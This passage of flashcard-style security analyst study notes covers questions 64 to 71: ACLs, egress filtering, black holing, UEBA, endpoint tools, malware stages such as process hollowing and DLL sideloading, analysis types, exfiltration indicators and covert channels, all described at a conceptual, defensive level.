How to Mitigate DGA
* Use a secure recursive DNS resolver
* This allows one trusted DNS server to communicate with other trusted DNS servers to search for an IP address and return it to the client

Question 64

ACL

Answer 64

Access control lists are processed from top to bottom with the most specific rules at the top

Basic rules for ACL:
1. Block incoming requests from internal or private, loopback, and multicast IP address ranges
2. Block incoming requests from protocols that should only be used locally, like ICMP, DHCP, OSPF, SMB, etc
3. Configure IPv6 to either block all IPv6 traffic or allow it to only authorized hosts and ports

Drop vs Reject
* Deny rule can either drop a packet or explicitly reject it by sending a TCP RST or an ICMP port/protocl unreachable to the requester
* Dropping traffic makes it harder for attackers to identify port states accurately

Egress Filtering
Applies ACL rules to outoing traffic to prevent malware from communicating to C2 servers

Best practices to configure egress filters:
1. Only allow whitelisted application ports and destination addresses
2. Restrict DNS lookups to trusted and authorized DNS services
3. Block access to known bad IP address ranges (block list)
4. Block all internet access from host subnets that don’t use it (ICS, SCADA)

NOTE: These practices can’t eliminiate all malware C2 since many operate of social media and cloud-based HTTPS connections (Slack server, FB messenger, etc), but they still help

Black Hole
* Means of mitigating DoS or intrusion attacks by silently dropping (discarding) the traffic
* You black hole it, you throw it away, so it doesn’t get to the intended target
* More effective than using ACL on a firewall
* Can be done at firewall or router level, but at firewall level you use a lot of processing power and router is more efficient—so use it at the router level
* At router, sends traffic to the null interface that drops all traffic coming its way
* EX: Redirect all dark nets to a block hole until they’re needed for business operations

Question 65

UEBA

Answer 65

User and Entity Behavior Analytics

A system that can provide automated identification of suspicious activity by user accounts and computer hosts

Less about endpoint data collection and more about the actual process of analyzing the data you’re getting

The idea is to get a baseline of good knowledge, and then compare anything that goes outside of that baseline and start thinking it may be suspicious

UEBA is focused on analytics, and UEBA solutions are heavily reliant on AI and ML to process all of that data
* Microsoft Advanced Threat Analytics
* Splunk User Behavior Analytics

Question 66

HIDS / HIPS

Answer 66

Host based IDS / IPS

They monitor a computer system for unexpected behavior or drastic changes to the system’s state on an endpoint

Most use signature-based detection with log or file monitoring systems to see if something bad is happening to your endpoint, and they may use file system integrity monitoring as well to see if your OS files, drivers, or apps have been changed

These are things that NIDS / NIPS can’t see

Question 67

EPP

Answer 67

Endpoint Protection Platform

A software agent and monitoring system that performs multiple security tasks like antivirus, HIDS / HIPS, firewall, DLP, and file encryption in one product

The Swiss Army Knife of security tools

Question 68

Malware Exploitation

Answer 68

Most modern malware uses fileless techniques to avoid detection by signature-based security software, and here’s how a modern APT would use this to operate:
1. Dropper or downloader
2. Maintain access
3. Strengthen access
4. Actions on objectives
5. Concealment

Let’s look at some key terms associated with these steps:

Dropper
* Malware designed to install or run other types of malware embedded in a payload of an infected host
* Usually this is a stage 1 dropper, the code you first got
* When you get that code and run it, it goes out to get more code through a downloader

Downloader
* A piece of code that connects to the internet to retrieve additional tools after the initial infection by a dropper
* Stage 2 for the downloader

Shell Code
* Any lightweight code designed to run an exploit on the target, which can include any type of code format from scripting languages to binary code
* Once shell code is created as a process, bad stuff happens via code injection

Code Injection
* Exploit technique that runs malicious code with the identification number of a legitimate process
* Attackers can hide malware within processes by injecting code into them

Masquerading
* Dropper replaces a genuine exe with a malicious one

DLL Injection
* Dropper starts forcing a process to load as part of the DLL
* Loads the DLL and exe malicious code

DLL Sideloading
* Dropper exploits a vulnerability in a legitimate program manifest to load a malicious DLL at runtime

Process Hollowing
* Dropper starts a process in a suspended state and then rewites the process code with the malware code
* Taking over some place in memory to put malicious code in

Question 69

Types of Analysis

Answer 69

Conditional Analysis
* A simple form of correlation performed by a machine by using signature detection and rules-based policies
* Very clear cut—rule and signature based
* Conditional requires you to have rules, and if you don’t have rules you’re going to be blind to zero days and new TTPs
* This type of analysis also creates large numbers of false positives because the rules are basic and don’t understand the intricacies of human behavior

Heuristic Analysis
* A method that uses feature comparisons and likenesses rather than specific signature matching to identify whether the target of observation is malicious
* Uses ML to alert on behavior that’s similar to a signature or rule, but not exact
* The benefit is that attackers are smart, and if they realize their patterns are flagging alerts, they’ll modify their patterns—but heuristics will find the new patterns too because ML and AI
* Over time the machines learn what’s bad and what’s good
* Returns a lot of false positives and negatives, but it gets better over time

Behavioral Analysis
* A network monitoring system that detects changes in normal operating data sequences and identifies abnormal sequences
* Generates an alert whenever anything deviates outside a defined level of tolerance from a given baseline
* Generates a lot of false positives and negatives, until your statistical model is trained and tuned
* Creating our own standard

Anomaly Analysis
* A network monitoring system that uses a baseline of acceptable outcomes or event patterns to identify events that fall outside an acceptable range
* Generates an alert on any event or outcome that doesn’t follow a set pattern
* Uses prescribed patterns like an RFC or industry standard

Question 70

Data Exfiltration

Answer 70

HTTP/S Transfers
* An attacker uses commercial file sharing services to upload the exfiltrated data from a victim
* DropBox, GDrive, etc

HTTP request to database services
* An attacker may use SQL injection or similar techniques to copy records from the database to which they should not have access
* IoC: A spike in requests to a PHP or other script files, and unusually large HTTP response packets

DNS
* Use of DNS queries to transmit data out of a network enclave
* IOC: If you see an atypical query type being used, like TXT, MX, CNAME, and NULL

Overt Channels
* A channel meant to send data
* Use of FTP, instant messaging, P2P, email, and other obvious file and data sharing tools

Explicit Tunnels
* Use of SSH or VPNs to create a tunnel to transmit the data across a given network
* IOC: Atypical endpoints involved in tunnels due to their geographic locations

NOTE:
* Attackers can use a different channel for exfiltration than for C2

Mitigation
* Use strong encryption of data at rest and data in transit

Question 71

Covert Channels

Answer 71

Covert Channels
* Transmitting Data Over Nonstandard Port
* Encoding Data in TCP/IP Packet Headers
* Segmenting Data Into Multiple Packets
* Obfuscating Data Using Hex
* Transmitting Encrypted Data

Mitigation
* Advanced intrusion detection and user behavior analytics tools are best, but won’t detect everything

Covert Storage Channel
* Uses one process to write to a storage location and another process to read from that location

Covert Timing Channel
* Uses one process to alter a system resources so that changes in its response time can signal information to a recipient process